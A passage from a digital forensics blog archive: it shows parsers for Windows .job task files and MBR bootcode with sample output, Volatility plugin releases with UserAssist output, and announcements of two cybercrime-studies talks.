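0000 0800 0000 0000 0000 0000 0100 3000 0000 dc07 0700 1000 0000 0000 0000 0b00
1a00 0000 0000 0000 0000 0000 0000 0000 0000 feff ffff fd68 7377 0000 0000 0100
0100 0416 10dd 78d9 b300 f7f0 9b20 9bd8 a0c4 5108 c943 d5c9 c64f 47ea 6052 0349
23e1 e1ab 6815 e8ef 219e 6d3b aa88 1360 706b c27b 2e44 9db1 4e89 81ca dd0a 869e
2b61""")

# FIXDLEN_DATA: 68 LE bytes = 2 WORDs, 16-byte UUID, 6 WORDs, 5 DWORDs, SYSTEMTIME.
FIXED_FMT = "<HH16s6H5I8H"
FIXED_LEN = struct.calcsize(FIXED_FMT)  # 68
# A TRIGGER opens with 10 WORDs + 4 DWORDs; its first WORD (Trigger Size)
# covers the whole record, including the type-specific tail.
TRIGGER_FMT = "<10H4I"
# Product version values from MS-TSCH (the dump above carries 0x0600, Vista).
PRODUCT_VERSIONS = {0x0400: "Windows NT 4.0", 0x0500: "Windows 2000",
                    0x0501: "Windows XP", 0x0600: "Windows Vista"}

def read_u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0], off + 2

def read_ustring(buf, off):
    """Length-prefixed UTF-16LE string: the WORD length is a character count
    that includes the terminating NUL, and 0 means the field is not set."""
    n, off = read_u16(buf, off)
    if n == 0:
        return "", off
    raw = buf[off:off + 2 * n]
    if len(raw) != 2 * n:
        raise ValueError("truncated string at offset 0x%x" % off)
    return raw.decode("utf-16-le").rstrip("\x00"), off + 2 * n

def systemtime_to_iso(fields):
    year, month, _weekday, day, hour, minute, sec, ms = fields
    if year == 0:  # all-zero SYSTEMTIME: the task has never run
        return None
    return datetime(year, month, day, hour, minute, sec,
                    ms * 1000).isoformat(timespec="milliseconds")

def parse_job(buf):
    if len(buf) < FIXED_LEN:
        raise ValueError("shorter than the fixed-length section")
    f = struct.unpack_from(FIXED_FMT, buf, 0)
    job = {
        "product_version": f[0],
        "product_name": PRODUCT_VERSIONS.get(f[0], "unknown (0x%04x)" % f[0]),
        "file_version": f[1],
        "uuid": "{%s}" % str(uuid.UUID(bytes_le=f[2])).upper(),
        "app_name_offset": f[3], "trigger_offset": f[4],
        "error_retry_count": f[5], "error_retry_interval": f[6],
        "idle_deadline": f[7], "idle_wait": f[8], "priority": f[9],
        "max_run_time_ms": f[10], "exit_code": f[11], "status": f[12],
        "flags": f[13], "last_run": systemtime_to_iso(f[14:22]),
    }
    off = FIXED_LEN
    job["running_instances"], off = read_u16(buf, off)
    for name in ("application", "parameters", "working_directory",
                 "user", "comment"):
        job[name], off = read_ustring(buf, off)
    for _blob in ("user_data", "reserved_data"):  # size-prefixed, skipped
        size, off = read_u16(buf, off)
        off += size
    if off != job["trigger_offset"]:  # cross-check against the header
        raise ValueError("trigger section at 0x%x, header says 0x%x"
                         % (off, job["trigger_offset"]))
    count, off = read_u16(buf, off)
    job["triggers"] = []
    for _ in range(count):
        t = struct.unpack_from(TRIGGER_FMT, buf, off)
        job["triggers"].append({
            "begin": (t[2], t[3], t[4]), "end": (t[5], t[6], t[7]),
            "start": (t[8], t[9]), "minutes_duration": t[10],
            "minutes_interval": t[11], "flags": t[12], "type": t[13]})
        off += t[0]
    if len(buf) - off >= 4:  # Job Signature header: version, min client
        job["signature_version"], off = read_u16(buf, off)
        job["min_client_version"], off = read_u16(buf, off)
    return job

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else AT5_JOB
    for key, value in parse_job(data).items():
        print("%-22s %s" % (key, value))
```

Run it with a path to a .job file to parse that file instead of the embedded dump; the trigger-offset cross-check raises on a file whose variable-length strings do not line up with the header.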
<p>So I am releasing a job file parser script that can parse out almost all of the items mentioned above. You can find it <a href="https://raw.github.com/gleeda/misc-scripts/master/misc_python/jobparser.py">here</a>. The only things left off are the user/reserved data, some of the trigger data, and the job signature sections. I have only tested this on 32 bit *nix systems, so let me know if you hit issues on other platforms. You can see example output for the above job file below:</p>
<pre><p class="code">
$ python jobparser.py -f At5.job
Product Info: Windows Vista
File Version: 1
UUID: {F77378E3-8B4D-452A-A589-1CC5FA64CFD2}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Properties not set
Flags: TASK_FLAG_DONT_START_IF_ON_BATTERIES
Date Run: Monday Jul 16 11:26:00.15 2012
Running Instances: 0
Application: cmd
Parameters: /c notepad.exe
Working Directory: Working Directory not set
User: SYSTEM
Comment: Created by NetScheduleJobAdd.
Scheduled Date: Jul 16 11:26:00.0 2012
</p></pre>
<p>Here is some output of job files taken from a Windows 2008 machine:</p>
<pre><p class="code">
$ python jobparser.py -d Tasks/
************************************************************************
File: Tasks/At1.job
Product Info: Windows Vista
File Version: 1
UUID: {CE14B659-4115-4263-BFAD-A8318428AB68}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Properties not set
Flags: TASK_FLAG_DONT_START_IF_ON_BATTERIES
Date Run: Task not yet run
Running Instances: 0
Application: notepad.exe
Working Directory: Working Directory not set
User: SYSTEM
Comment: Created by NetScheduleJobAdd.
Scheduled Date: Jul 17 02:20:00.0 2012
************************************************************************
************************************************************************
File: Tasks/At2.job
Product Info: Windows Vista
File Version: 1
UUID: {46F61E52-4581-49A9-9AD0-2244C206AEEB}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Properties not set
Flags: TASK_FLAG_DONT_START_IF_ON_BATTERIES
Date Run: Task not yet run
Running Instances: 0
Application: notepad.exe
Working Directory: Working Directory not set
User: SYSTEM
Comment: Created by NetScheduleJobAdd.
Scheduled Date: Jul 16 14:20:00.0 2012
************************************************************************
</p></pre>
<p>And here are a couple of XP tasks; notice that one has a "Running Instances" value of "1", because that file was copied while the command was running:</p>
<pre><p class="code">
************************************************************************
File: Solitaire.job
Product Info: Windows XP
File Version: 1
UUID: {3824DDBB-A037-4016-B99A-28BD95D429AF}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Task has not run
Flags: TASK_FLAG_INTERACTIVE, TASK_FLAG_DELETE_WHEN_DONE
Date Run: Monday Aug 13 12:37:00.10 2012
Running Instances: 1
Application: C:\WINDOWS\system32\sol.exe
Working Directory: C:\WINDOWS\system32
User: user
Comment: Comment not set
Scheduled Date: Aug 13 12:37:00.0 2012
************************************************************************
************************************************************************
File: Solitaire2.job
Product Info: Windows XP
File Version: 1
UUID: {3824DDBB-A037-4016-B99A-28BD95D429AF}
Maximum Run Time: 72:00:00.0 (HH:MM:SS.MS)
Exit Code: 0
Status: Task is ready to run
Flags: TASK_FLAG_INTERACTIVE, TASK_FLAG_DELETE_WHEN_DONE
Date Run: Monday Aug 13 12:37:00.10 2012
Running Instances: 0
Application: C:\WINDOWS\system32\sol.exe
Working Directory: C:\WINDOWS\system32
User: user
Comment: Comment not set
Scheduled Date: Aug 13 12:37:00.0 2012
************************************************************************
</p></pre>
<p>References:<br><br>
[1] Windows Forensic Analysis 2nd Ed., Harlan Carvey<br>
[2] .JOB File Format, http://msdn.microsoft.com/en-us/library/cc248285%28v=prot.13%29.aspx<br>
[3] Windows Scheduler (at job) Forensics, http://computer-forensics.sans.org/blog/2009/09/16/windows-scheduler-at-job-forensics<br>
</p>
<p>Jamie Levy</p>
<p><font size="4">MBR Parser</font> (2012-04-21)</p>
<p>With the increase in <a href="http://forensicmethods.com/mbr-malware">MBR infectors</a>, I've decided to release a script I wrote that parses the MBR and also hashes and disassembles the bootcode. I've found that MBR bootcode is pretty stable across systems running the same OS, so this script should let you quickly check a system for any discrepancies.</p>
<p>You of course need Python and <a href="http://code.google.com/p/distorm/">Distorm</a> to use this script.</p>
<p>A shortened example output can be seen below:</p>
<pre>
<p class="code">
$ python mbr_parser.py -f mbr.bin
Disk signature: 96-80-96-80
Bootcode md5: 4ad444d4e7efce9485a94186c3f4b157
Bootcode Disassembly:
00000000: 33c0 XOR AX, AX
00000002: 8ed0 MOV SS, AX
00000004: bc007c MOV SP, 0x7c00
00000007: fb STI
00000008: 50 PUSH AX
00000009: 07 POP ES
0000000a: 50 PUSH AX
0000000b: 1f POP DS
0000000c: fc CLD
0000000d: 50 PUSH AX
0000000e: be007c MOV SI, 0x7c00
00000011: bf0006 MOV DI, 0x600
00000014: b90002 MOV CX, 0x200
00000017: f3a4 REP MOVSB
00000019: bf1e06 MOV DI, 0x61e
0000001c: 57 PUSH DI
0000001d: cb RETF
0000001e: b441 MOV AH, 0x41
00000020: b280 MOV DL, 0x80
00000022: bbaa55 MOV BX, 0x55aa
00000025: cd13 INT 0x13
00000027: 81fb55aa CMP BX, 0xaa55
0000002b: 7530 JNZ 0x5d
0000002d: f6c101 TEST CL, 0x1
00000030: 742b JZ 0x5d
00000032: be0008 MOV SI, 0x800
00000035: c7041000 MOV WORD [SI], 0x10
00000039: c744020600 MOV WORD [SI+0x2], 0x6
[snip]
000001b2: 0000 ADD [BX+SI], AL
000001b4: 002c ADD [SI], CH
000001b6: 44 INC SP
000001b7: 63 DB 0x63
===== Partition Table #1 =====
Boot flag: 0x80 (Bootable)
Partition type: 0x7 (NTFS)
Starting Sector (LBA): 0x3f (63)
Starting CHS: Cylinder: 0 Head: 1 Sector: 1
Ending CHS: Cylinder: 520 Head: 254 Sector: 63
Size in sectors: 0x7fb68a (8369802)
===== Partition Table #2 =====
Boot flag: 0x0
Partition type: 0x0 (Empty)
Starting Sector (LBA): 0x0 (0)
Starting CHS: Cylinder: 0 Head: 0 Sector: 0
Ending CHS: Cylinder: 0 Head: 0 Sector: 0
Size in sectors: 0x0 (0)
===== Partition Table #3 =====
Boot flag: 0x0
Partition type: 0x0 (Empty)
Starting Sector (LBA): 0x0 (0)
Starting CHS: Cylinder: 0 Head: 0 Sector: 0
Ending CHS: Cylinder: 0 Head: 0 Sector: 0
Size in sectors: 0x0 (0)
===== Partition Table #4 =====
Boot flag: 0x0
Partition type: 0x0 (Empty)
Starting Sector (LBA): 0x0 (0)
Starting CHS: Cylinder: 0 Head: 0 Sector: 0
Ending CHS: Cylinder: 0 Head: 0 Sector: 0
Size in sectors: 0x0 (0)
</p>
</pre>
<p><font color="red"><b>Update: </b></font>Fixed output to 16bit assembly. Thanks for the feedback!</p>
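<p>An added example of the same kind of parsing (this is not the mbr_parser.py script itself, and it leaves the Distorm disassembly out): it reads the disk signature, hashes the 440 bytes of bootcode before it, unpacks the four partition entries with their packed CHS fields, and compares the bootcode hash against a baseline set, which is the "stable across systems of the same OS" check described above. The sample MBR it builds is constructed to match the partition table in the output above; its bootcode is only the first instructions from the listing padded with zeros, so its hash is not a real baseline value. The baseline set, the partition-type table and the audit findings are assumptions of this example.</p>

```python
import hashlib
import struct

SECTOR = 512
DISK_SIGNATURE_OFF = 0x1B8
PARTITION_TABLE_OFF = 0x1BE
BOOT_SIGNATURE = b"\x55\xAA"

# Common partition type IDs; anything else is reported with its raw byte.
PARTITION_TYPES = {
    0x00: "Empty", 0x05: "Extended", 0x07: "NTFS", 0x0B: "FAT32", 0x0C: "FAT32 (LBA)",
    0x0F: "Extended (LBA)", 0x82: "Linux swap", 0x83: "Linux", 0xEE: "GPT protective",
}


def decode_chs(b):
    """Unpack a 3-byte packed CHS field: head, 6-bit sector, 10-bit cylinder."""
    head = b[0]
    sector = b[1] & 0x3F
    cylinder = ((b[1] & 0xC0) << 2) | b[2]
    return cylinder, head, sector


def parse_mbr(mbr):
    """Parse a 512-byte MBR into bootcode hash, disk signature and the four table entries."""
    if len(mbr) != SECTOR:
        raise ValueError("expected a %d-byte sector, got %d bytes" % (SECTOR, len(mbr)))
    info = {
        "valid_signature": mbr[0x1FE:0x200] == BOOT_SIGNATURE,
        "disk_signature": "-".join("%02x" % c for c in mbr[DISK_SIGNATURE_OFF:DISK_SIGNATURE_OFF + 4]),
        # Bootcode is everything before the disk signature (offsets 0x000 to 0x1B7).
        "bootcode_md5": hashlib.md5(mbr[:DISK_SIGNATURE_OFF]).hexdigest(),
        "partitions": [],
    }
    for i in range(4):
        boot, chs_start, ptype, chs_end, lba, size = struct.unpack_from(
            "<B3sB3sII", mbr, PARTITION_TABLE_OFF + 16 * i)
        info["partitions"].append({
            "index": i + 1, "boot_flag": boot, "bootable": boot == 0x80,
            "type": ptype, "type_name": PARTITION_TYPES.get(ptype, "Unknown (0x%02x)" % ptype),
            "start_chs": decode_chs(chs_start), "end_chs": decode_chs(chs_end),
            "start_lba": lba, "size_sectors": size,
        })
    return info


def audit_mbr(mbr, baseline_md5s):
    """Return the findings a reviewer would want: baseline_md5s is the set of bootcode
    hashes known to be good for this OS build; an empty list means nothing stood out."""
    info = parse_mbr(mbr)
    findings = []
    if not info["valid_signature"]:
        findings.append("missing 0x55AA boot signature")
    if info["bootcode_md5"] not in baseline_md5s:
        findings.append("bootcode md5 %s not in baseline" % info["bootcode_md5"])
    bootable = [p["index"] for p in info["partitions"] if p["bootable"]]
    if len(bootable) > 1:
        findings.append("more than one partition flagged bootable: %s" % bootable)
    used = [p for p in info["partitions"] if p["type"] != 0]
    for p in used:
        if p["boot_flag"] not in (0x00, 0x80):
            findings.append("partition %d has invalid boot flag 0x%02x" % (p["index"], p["boot_flag"]))
    # Non-empty entries must not overlap on disk.
    spans = sorted((p["start_lba"], p["start_lba"] + p["size_sectors"], p["index"]) for p in used)
    for (s1, e1, i1), (s2, e2, i2) in zip(spans, spans[1:]):
        if s2 < e1:
            findings.append("partitions %d and %d overlap" % (i1, i2))
    return findings


def build_sample_mbr():
    """Constructed sample (not a real disk): bootcode is the first instructions of the
    listing above padded with zeros, followed by the disk signature and partition table shown."""
    bootcode = bytes.fromhex("33c08ed0bc007cfb5007501ffc50be007cbf0006b90002f3a4bf1e0657cb")
    mbr = bytearray(SECTOR)
    mbr[:len(bootcode)] = bootcode
    mbr[DISK_SIGNATURE_OFF:DISK_SIGNATURE_OFF + 4] = bytes.fromhex("96809680")
    # Entry 1: bootable, CHS 0/1/1, NTFS, CHS 520/254/63, LBA 63, 0x7fb68a sectors.
    mbr[PARTITION_TABLE_OFF:PARTITION_TABLE_OFF + 16] = struct.pack(
        "<B3sB3sII", 0x80, bytes([0x01, 0x01, 0x00]), 0x07, bytes([0xFE, 0xBF, 0x08]), 0x3F, 0x7FB68A)
    mbr[0x1FE:0x200] = BOOT_SIGNATURE
    return bytes(mbr)


if __name__ == "__main__":
    sample = build_sample_mbr()
    parsed = parse_mbr(sample)
    print("Disk signature:", parsed["disk_signature"], " bootcode md5:", parsed["bootcode_md5"])
    for p in parsed["partitions"]:
        print(p)
    print("Findings against an empty baseline:", audit_mbr(sample, set()))
```

<p>In practice the baseline set is filled with the bootcode hashes collected from known-clean machines of the same OS build, and any image whose hash falls outside it gets its disassembly reviewed.</p>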
<p>The script can be found <a href="https://raw.github.com/gleeda/misc-scripts/master/misc_python/mbr_parser.py">here</a>.</p>
<p>Jamie Levy</p>
<p><font size="4">Upcoming Cybercrime Studies talk: For a Free Digital Society by Dr. Richard Stallman</font> (2012-03-23)</p>
<p>Yet another interesting upcoming talk at John Jay College on Tuesday, March 27, 2012:</p>
<div style="text-align: center;">
<p><b>Center for Cybercrime Studies</b><br />
<b>John Jay College of Criminal Justice</b><br />
<b>presents</b><br />
<b>For a Free Digital Society</b><br />
<b>Dr. Richard Stallman</b><br />
President<br />
Free Software Foundation</p>
<p>Abstract</p>
</div>
<p>Activities directed at "including" more people in the use of digital technology are predicated on the assumption that such inclusion is invariably a good thing. It appears so, when judged solely by immediate practical convenience. However, if we also judge in terms of human rights, whether digital inclusion is good or bad depends on what kind of digital world we are to be included in. If we wish to work towards digital inclusion as a goal, it behooves us to make sure it is the good kind.</p>
<p>Richard Stallman launched the free software movement in 1983 and started the development of the GNU operating system (see <a href="http://www.gnu.org/" target="_blank">www.gnu.org</a>) in 1984. GNU is free software: everyone has the freedom to copy it and redistribute it, with or without changes. The GNU/Linux system, basically the GNU operating system with Linux added, is used on tens of millions of computers today. Stallman has received the ACM Grace Hopper Award, a MacArthur Foundation Fellowship, the Electronic Frontier Foundation's Pioneer Award, and the Takeda Award for Social/Economic Betterment, as well as several honorary doctorates.</p>
<p>Date: Tuesday, March 27, 2012<br />
Time: 1:30 PM<br />
Location: L.61 Conference Center (New Building)<br />
John Jay College of Criminal Justice<br />
899 Tenth Avenue<br />
New York, NY</p>
<p><b><i><u>RSVP</u>: Nicole Daniels at <a href="tel:212-237-8920" target="_blank">212-237-8920</a> or email <a href="mailto:ndaniels@jjay.cuny.edu" target="_blank">ndaniels@jjay.cuny.edu</a></i></b>. For additional information please contact Professor Doug Salane, Director of the Center for Cybercrime Studies, <a href="tel:212-237-8836" target="_blank">212-237-8836</a> or email <a href="mailto:dsalane@jjay.cuny.edu" target="_blank">dsalane@jjay.cuny.edu</a>.</p>
<p>For additional Center for Cybercrime Studies events visit our <a href="http://www.jjay.cuny.edu/centers/cybercrime_studies/index.php" target="_blank">web site</a>. Go to <a href="http://www.jjay.cuny.edu/" target="_blank">WWW.JJAY.CUNY.EDU</a>, ACADEMICS, RESEARCH CENTERS and INSTITUTES.</p>
<p>Jamie Levy</p>
<p><font size="4">Differential EnScript</font> (2012-03-22)</p>
<p>I know I haven't written much in the last few months; I've been busy. Even though I'm writing a blog post today, it's still going to be pretty short, because most of what I have to say has already been written up in the documentation ahead of time. Today I'm releasing an EnScript that allows you to compare two disk images using various options. The purpose of this EnScript is to find differences on a machine after some event, such as an infection or a software installation, has taken place.</p>
<p>I'm also releasing the source in hopes that others will be able to troubleshoot or expand it themselves as needed. I offer no warranties for this script nor promises that it is beautiful code (in all reality this was written hastily out of necessity); it is provided "as-is" and has worked well enough for my purposes. Unlike most of my stuff, however, I actually took the time to create a GUI for it to make it easier to use. Information on how it works can be found in the <a href="http://jls-scripts.googlecode.com/files/Differential%20EnScript%20v1.pdf">documentation</a> (pdf), so I will not cover it here. Hopefully someone out there will find it useful.</p>
<p>Please feel free to leave comments and suggestions here or by email.</p>
<p>Here is the <a href="https://raw.github.com/gleeda/misc-scripts/master/EnScripts/Differential.EnScript">Differential.EnScript</a>.</p>
<p>Jamie Levy</p>
<p><font size="4">Upcoming Cybercrime Studies talk: Digital Forensic Crime Labs</font> (2012-03-16)</p>
<p>I just wanted to take the time to announce the following upcoming talk at John Jay College next week:</p>
<div style="text-align: center;">
<p>The Center for Cybercrime Studies<br />
John Jay College of Criminal Justice<br />
Presents<br />
Digital Forensic Crime Labs<br />
Monique Mattei Ferraro<br />
M.S., J.D., CISSP<br />
Technology Forensics, LLC</p>
</div>
<p>Digital forensics labs throughout the country were set up and subsidized by the United States Department of Justice. Most labs are administered by police or law enforcement agencies. In 2009, the National Academy of Science released "Strengthening Forensic Science in the United States: A Path Forward," which made several recommendations. Among them was that crime labs should be independent of police/law enforcement in order to retain an appearance of objectivity. This talk delves into the tensions between the recommendations and the practice, the ethical implications, and current issues affecting digital forensics labs today.</p>
<p>Date: Wednesday, March 21, 2012<br />
Time: 1:30 PM<br />
Location: Haaren Hall, RM 630<br />
899 Tenth Avenue<br />
(10th Avenue and 59th Street)</p>
<p>RSVP: Nicole Daniels at 212-237-8920 or email <a href="mailto:ndaniels@jjay.cuny.edu">ndaniels@jjay.cuny.edu</a>. For additional information please contact Professor Doug Salane, Director of the Center for Cybercrime Studies, 212-237-8836 or email <a href="mailto:dsalane@jjay.cuny.edu">dsalane@jjay.cuny.edu</a>.</p>
<p>For additional Center for Cybercrime Studies events visit our Web site (<a href="http://www.jjay.cuny.edu/centers/cybercrime_studies/index.php" target="_blank">http://www.jjay.cuny.edu/centers/cybercrime_studies/index.php</a>) or go to <a href="http://www.jjay.cuny.edu/" target="_blank">WWW.JJAY.CUNY.EDU</a>, ACADEMICS, RESEARCH CENTERS and INSTITUTES.</p>
<p>Jamie Levy</p>
<p><font size="4">Volatility 2.0: Timeliner, RegistryAPI, evtlogs and more</font> (2011-09-13, updated 2011-09-28)</p>
<p>Back in July <a href="http://gleeda.blogspot.com/2011/08/volatility-20-and-omfw.html">I gave a talk</a> at <a href="https://www.volatilesystems.com/default/omfw">OMFW</a> about extracting timeline data from a memory sample using the Volatility framework. Now it is time to release the plugins that accompanied that talk.</p>
<p>In addition to the plugins I <a href="http://jls-scripts.googlecode.com/files/Timeliner%20Release%20Documentation.pdf">have included a whitepaper</a> on how these plugins were created and used. It is released mainly in the hope that people will see how to use the framework and be able to write their own plugins or extend existing ones.</p>
<p>I have included all these plugins in a zip file:</p>
<pre><p class="code">
$ unzip -l timeliner_9-2011.zip 
Archive: timeliner_9-2011.zip
 Length Date Time Name
 -------- ---- ---- ----
 14455 09-28-11 14:40 volatility/plugins/timeliner.py
 10789 09-27-11 09:24 volatility/plugins/evtlogs.py
 147458 09-09-11 11:03 volatility/plugins/malware.py
 13559 09-22-11 19:09 volatility/plugins/registryapi.py
 8554 09-18-11 21:33 volatility/plugins/getsids.py
 40993 09-22-11 16:29 volatility/plugins/getservicesids.py
 -------- -------
 235808 6 files
</p></pre>
<ul><li>evtlogs.py: plugin to parse Evt logs from XP/2K3</li><li>registryapi.py: plugin for routine registry actions</li><li>getservicesids.py: plugin to collect and calculate service SIDs (used with the new getsids and evtlogs plugins)</li><li>timeliner.py: the timeline creating script that pulls everything together</li></ul>
<p><a href="http://mnin.blogspot.com/">MHL</a>'s <a href="http://malwarecookbook.googlecode.com/svn/trunk/malware.py">malware plugins (malware.py)</a> are included only for convenience. You can also download them from his repository and check there for updates.</p>
<p>I would like to thank MHL and AW for their valuable feedback and Bertha M for extensive testing of the timeliner plugins. The links to the paper and plugins are below:</p>
<p><a href="http://jls-scripts.googlecode.com/files/Timeliner%20Release%20Documentation.pdf">Timeliner Release Documentation</a> (PDF)<br />
<a href="http://jls-scripts.googlecode.com/files/timeliner_9-2011.zip">timeliner plugins</a> (ZIP)</p>
<p><i>Note: Any updates to these plugins will appear in my <a href="https://github.com/gleeda/Volatility-Plugins">github repository</a> first.</i></p>
<p>Jamie Levy</p>
<p><font size="4">Volatility 2.0 and OMFW</font> (2011-08-08)</p>
<p>In case you missed it, <a href="http://volatility.tumblr.com/post/8427878763/volatility-2-0-release-open-memory-forensics-workshop">Volatility 2.0 has been released</a>! Please download it, test it out, and let us know if you have any problems via the <a href="http://code.google.com/p/volatility/issues/list">"issues area" of the Google Code project</a>. We have <a href="http://code.google.com/p/volatility/w/list">lots of documentation</a>, and for those on Windows who don't like to install Python, there is a standalone executable available in the <a href="http://code.google.com/p/volatility/downloads/list">downloads section</a>. Make sure to check out the <a href="http://code.google.com/p/volatility/wiki/FAQ">FAQ wiki</a>, which contains information on what is supported and how to use <a href="http://mnin.blogspot.com/">MHL</a>'s malware plugins.</p>
<br />
<br />Some <a href="https://www.volatilesystems.com/default/omfw">OMFW</a> materials have been released:
<br />
<br /><a href="http://amnesia.gtisc.gatech.edu/~moyix/OMFW_Virtuoso.pdf">Moyix's slides</a> (pdf).
<br /><a href="http://mnin.blogspot.com/2011/06/examining-stuxnets-footprint-in-memory.html">MHL's Stuxnet blogpost and slides</a>.
<br /><a href="https://docs.google.com/leaf?id=0B7mg0ZBnpGuOZjVlYjJmMWMtYTgyYy00OGVlLTkxNmYtZWM2YmJjNzc1Zjc0&hl=en_US">My slides</a> (google docs)
<br />
<br />You can help with the development of Volatility by giving us suggestions for plugins, writing documentation or donating malware samples. Check out the <a href="http://code.google.com/p/volatility/wiki/FAQ">FAQ</a> for how to do all of the above.
<br />
<br />
<p>Jamie Levy</p>
<p><font size="4">Volatility 1.4 UserAssist plugin</font> (2011-04-30, updated 2012-01-06)</p>
From a computer forensics standpoint, UserAssist keys can provide a lot of information about user activity (see <a href="http://windowsir.blogspot.com/2011/04/using-regripper.html">Harlan's posts</a> for more information).<br /><br />After looking at <a href="http://blog.didierstevens.com/">Didier Stevens</a>' article on UserAssist keys for Windows 7 from <a href="http://intotheboxes.wordpress.com/2010/01/01/into-the-boxes-issue-0x0/">Into the Boxes issue 0x0</a> and at RegRipper, I decided to write a plugin for <a href="http://code.google.com/p/volatility/">Volatility</a> that pulls out UserAssist keys from all versions of Windows.<br /><br />One thing I decided to add was an enumeration of GUIDs to human-friendly folder names, which were obtained from <a href="http://msdn.microsoft.com/en-us/library/dd378457%28v=vs.85%29.aspx">here</a>.<br /><br />The plugin is available <a href="https://github.com/gleeda/Volatility-Plugins/raw/master/userassist.py">in my git repository</a>. Simply download it, place it into your volatility/plugins directory, and you're set.<br /><br /><font color="red"><b>Update: This plugin is now part of the core <a href="http://code.google.com/p/volatility/">Volatility code</a></b></font><br /><br /><font size="4">Example Output</font><br /><br />Below you can see some snippets of output for Windows 7. The fields are pretty self-explanatory, though you can read Didier Stevens' article for more details. The hex dump is the actual data from which this information was parsed, so you can verify it yourself.<br />
<pre><p class="code2">
$ ./vol.py -f win7.vmem --profile=Win7SP0x86 userassist --no-cache
Volatile Systems Volatility Framework 1.4_rc1
----------------------------
Registry: \??\C:\Users\admin\ntuser.dat
Key name: Count
Last updated: 2010-07-06 22:40:25

Subkeys:

Values:
REG_BINARY Microsoft.Windows.GettingStarted :
Count: 14
Focus Count: 21
Time Focused: 0:07:00.500000
Last updated: 2010-03-09 19:49:20

0000 00 00 00 00 0E 00 00 00 15 00 00 00 A0 68 06 00 .............h..
0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................
0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................
0030 00 00 80 BF 00 00 80 BF FF FF FF FF EC FE 7B 9C ..............{.
0040 C1 BF CA 01 00 00 00 00 ........

REG_BINARY UEME_CTLSESSION :
Count: 187
Focus Count: 1205
Time Focused: 6:25:06.216000
Last updated: 1970-01-01 00:00:00

0000 00 00 00 00 BB 00 00 00 B5 04 00 00 B4 90 60 01 ..............`.
0010 10 00 00 00 39 00 00 00 E9 67 28 00 7B 00 44 00 ....9....g(.{.D.
0020 36 00 35 00 32 00 33 00 31 00 42 00 30 00 2D 00 6.5.2.3.1.B.0.-.
0030 42 00 32 00 46 00 31 00 2D 00 34 00 38 00 35 00 B.2.F.1.-.4.8.5.

[snip]

REG_BINARY %windir%\system32\displayswitch.exe :
Count: 13
Focus Count: 19
Time Focused: 0:06:20.500000
Last updated: 2010-03-09 19:49:20

0000 00 00 00 00 0D 00 00 00 13 00 00 00 60 CC 05 00 ............`...
0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................
0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................
0030 00 00 80 BF 00 00 80 BF FF FF FF FF EC FE 7B 9C ..............{.
0040 C1 BF CA 01 00 00 00 00 ........

REG_BINARY %windir%\system32\calc.exe :
Count: 12
Focus Count: 17
Time Focused: 0:05:40.500000
Last updated: 2010-03-09 19:49:20

0000 00 00 00 00 0C 00 00 00 11 00 00 00 20 30 05 00 ............ 0..
0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................
0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................
0030 00 00 80 BF 00 00 80 BF FF FF FF FF EC FE 7B 9C ..............{.
0040 C1 BF CA 01 00 00 00 00 ........

REG_BINARY Z:\vmware-share\apps\odbg110\OLLYDBG.EXE :
Count: 11
Focus Count: 266
Time Focused: 1:19:58.045000
Last updated: 2010-03-18 01:56:31

0000 00 00 00 00 0B 00 00 00 0A 01 00 00 69 34 49 00 ............i4I.
0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................
0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................
0030 00 00 80 BF 00 00 80 BF FF FF FF FF 70 3B CB 3A ............p;.:
0040 3E C6 CA 01 00 00 00 00 >.......

REG_BINARY %ProgramFiles%\Microsoft SDKs\Windows\v7.0\Bin\vsstools\vshadow.exe :
Count: 0
Focus Count: 67
Time Focused: 0:06:12.811000
Last updated: 1970-01-01 00:00:00

0000 00 00 00 00 00 00 00 00 43 00 00 00 57 AE 05 00 ........C...W...
0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................
0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................
0030 00 00 80 BF 00 00 80 BF FF FF FF FF 00 00 00 00 ................
0040 00 00 00 00 00 00 00 00 ........

REG_BINARY %windir%\regedit.exe :
Count: 2
Focus Count: 8
Time Focused: 0:03:22.626000
Last updated: 2010-03-17 23:40:36

0000 00 00 00 00 02 00 00 00 08 00 00 00 8E 15 03 00 ................
0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................
0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF ................
0030 00 00 80 BF 00 00 80 BF FF FF FF FF 90 3A 93 3E .............:.>
0040 2B C6 CA 01 00 00 00 00 +.......
</p></pre>
<br /><br />Here you can see an example of output from Windows XP:<br /><br />
<pre><p class="code2">
$ ./vol.py -f XPSP3.vmem --profile=WinXPSP3x86 userassist --no-cache
Volatile Systems Volatility Framework 1.4_rc1
----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\Administrator\NTUSER.DAT
Key name: Count
Last updated: 2010-11-24 16:35:34

Subkeys:

Values:
REG_BINARY UEME_CTLSESSION :
0000 91 52 5B 0E 1F 00 00 00 .R[.....

REG_BINARY UEME_CTLCUACount:ctor :
ID: 1
Count: 2
Last updated: 1970-01-01 00:00:00

0000 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 ................

REG_BINARY UEME_RUNPATH :
ID: 31
Count: 589
Last updated: 2010-11-24 16:30:49

0000 1F 00 00 00 52 02 00 00 A0 91 09 F4 F4 8B CB 01 ....R...........

REG_BINARY UEME_RUNPATH:D:\SETUP.EXE :
ID: 30
Count: 6
